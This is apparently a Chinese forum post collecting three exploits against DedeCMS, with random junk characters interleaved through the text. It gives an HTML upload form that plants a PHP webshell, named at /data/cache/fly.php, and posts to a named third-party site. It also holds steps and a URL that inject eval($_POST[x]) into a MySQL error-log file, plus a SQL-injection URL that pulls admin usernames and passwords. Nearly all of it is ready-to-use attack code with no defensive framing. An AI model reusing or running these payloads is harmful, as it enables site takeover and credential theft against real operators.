( m5 A: \* @4 M% u5 O& i: e) Z% P4 h B
4 G% m2 V% T* h6 E- m2 Z& P
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞5 o) D( u; [: l5 Q
<html>
z- F+ y8 u( x5 x& F9 w<head> Z$ c- H1 z6 Z+ j* _: d
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>* e' q+ \ v0 k! D
</head>
) E* g8 Q; B9 m2 i# G+ J& R: M<body style="FONT-SIZE: 9pt">% d9 } N) ~' h# S0 f! r+ N
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
: V5 ]+ _5 A+ D9 Z1 K+ ?( u<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>$ h+ e j4 a- a! H+ s
<input type='hidden' name='activepath' value='/data/cache/' />0 _( r. C, @; b& Y' E, ^& f) p
<input type='hidden' name='cfg_basedir' value='../../' />+ Y8 G/ o7 E& @3 ?& y
<input type='hidden' name='cfg_imgtype' value='php' />
2 Y6 i+ _" [$ h9 T- Q) g# J<input type='hidden' name='cfg_not_allowall' value='txt' />) ^2 B& j* [! E( ]
<input type='hidden' name='cfg_softtype' value='php' />
7 j+ f2 u! C( N0 M: P% _<input type='hidden' name='cfg_mediatype' value='php' />4 _6 [1 j; s% t4 S4 J
<input type='hidden' name='f' value='form1.enclosure' />) m! i! e4 J4 q9 Y, w3 N' y6 X
<input type='hidden' name='job' value='upload' />* s. H- V8 M* h: y b
<input type='hidden' name='newname' value='fly.php' />
( U8 j9 o5 j0 d1 u4 WSelect U Shell <input type='file' name='uploadfile' size='25' />+ f% D" v2 M0 O; S/ L
<input type='submit' name='sb1' value='确定' />. f; w3 f' n8 b0 g* H
</form>! y8 D- _( Q- m8 D7 D' z
<br />It's just a exp for the bug of Dedecms V55...<br />
% j9 _6 u- {" n( I8 ?* [9 P+ zNeed register_globals = on...<br />! q( r4 Q2 l8 W3 p# M8 H& _
Fun the game,get a webshell at /data/cache/fly.php...<br />; `9 M6 @! e+ m! N# t8 g$ s1 l
</body>8 G o: }4 e% t2 a; D0 l6 p3 U8 c
</html>
5 P6 C$ c# F5 ~8 K: t( y& u/ Y! @
7 U8 U- q4 q" |2 @/ F1 ?" q* z4 I4 d+ Y7 [5 y- ]7 P
1 X, W1 D3 r( }: F, f
% x9 S9 t0 g7 f, ?+ g6 F6 I! z' W1 s1 q& J2 y* b, V4 o( o+ h% [" E
" l- Y2 ]) j6 M+ ?/ t/ a3 V% _) s3 _# P9 E2 ^
C% G- W, g) `3 r# q8 D. g5 s
6 i% J* r8 l1 P& U7 H7 \) L
! } |; s+ [$ X2 S& B- l2 k1 y
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞" Q5 B; l# ]) p( _6 B! S
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
2 N" X3 P$ U( u; b& t) j1. 访问网址:
* m9 V" j# T( p1 ihttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>) t7 f3 D7 T: [5 i# I0 D4 w5 Q" U4 s
可看见错误信息+ C0 Y: B- {- u' ?- E$ D+ ]
1 U1 e+ F9 d) d
6 {, @# }5 Y E/ R8 K& M4 v' Q F2 E2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。3 G& w9 V. v0 F2 v: z2 ^
int(3) Error: Illegal double '1024e1024' value found during parsing
+ e0 H% t0 f3 N1 P$ W' @Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>' A0 I* Z) F) _& j
& a7 A! k8 t1 e" `1 X W
! ?# e7 C" M5 m. |( I6 h: K3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
& W, s7 |3 o# F" F; ^5 V' g9 S" |- v7 p6 F- h/ J: g) [& L
0 m! q: O" e- Y6 n# M" @<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
& n- ^0 a% X E z$ r6 U1 S
, R- u$ i+ T v% D' k
1 j6 h0 u: W9 ?& J按确定后的看到第2步骤的信息表示文件木马上传成功.
, t5 @# b! Z- @% k" ~( u
/ s, d. @1 W ?, K
1 s* x% R% a) _5 l7 e; K% Z" ?9 s, W7 R6 u" `, B
7 I% R& O1 m* I, q
9 J) z7 V5 x; M7 Q |
* t5 M9 Q; g4 }, {& H% x
! h# |& {4 w4 e: ~* J* ~$ O/ ]
; q) Q6 W+ e6 s& H' T: N: V, M% t' R W! g/ W# `9 ^! X* J
! P; ~, e! j9 ?1 l6 z j) a- R
0 {4 V( e/ a) @& ?! P; a% W
' H, X ]/ H+ F& |; r9 a织梦(DedeCms)plus/infosearch.php 文件注入漏洞) {( }! b' n! E" Z; {* c+ `
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|